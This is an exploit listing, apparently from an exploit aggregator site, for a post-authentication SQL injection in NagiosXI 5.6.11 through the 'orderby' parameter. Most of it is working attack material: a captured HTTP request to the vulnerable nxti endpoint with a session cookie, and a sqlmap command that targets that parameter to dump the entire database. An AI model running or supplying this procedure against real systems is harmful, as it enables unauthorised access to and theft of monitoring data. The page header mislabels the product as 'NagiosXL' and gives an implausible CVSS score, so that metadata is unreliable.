Exploit for NagiosXL 5.6.11 orderby SQL Injection

Name: Exploit for NagiosXL 5.6.11 orderby SQL Injection
Rating: 5 (98 reviews)

2020-04-09 | CVSS 0.3

## https://sploitus.com/exploit?id=PACKETSTORM:157178
# Title: Postauth SQL injection in NagiosXI 5.6.11 (param: orderby)  
# Date: 13.03.2020  
# Vendor: https://www.nagios.com/  
# Vulnerable software: https://www.nagios.com/downloads/nagios-xi/vmware/  
# Repo: https://github.com/c610/free/  
  
  
  
c@kali:~$ cat n2.txt  
GET /nagiosxi/includes/components/nxti/index.php?&mode=recTable&page=asde&perpage=5&search=&orderby=trapdata_log_datetime&orderdir=DESC HTTP/1.1  
Host: 192.168.1.10  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0  
Accept: */*  
Accept-Language: pl,en-US;q=0.7,en;q=0.3  
Accept-Encoding: gzip, deflate  
X-Requested-With: XMLHttpRequest  
Connection: close  
Referer: http://192.168.1.10/nagiosxi/includes/components/nxti/index.php?event=asd&oid=asd&category=asd&severity=asd&desc=asd&format=&SNMPTW-integrate=on&SNMPTW%5Bhost%5D=asd&SNMPTW%5Bservice%5D=asd&SNMPTW%5Bseverity%5D=%24s&SNMPTW%5Boutput%5D=asd&exec%5B%5D=&raw-data=&mode=save&tab=3&new=1  
Cookie: nagiosxi=4usi1041slmu9064dfqfo9c502  
  
  
c@kali:~$ sqlmap -r n2.txt -p orderby --random-agent --dbms=mysql --dump-all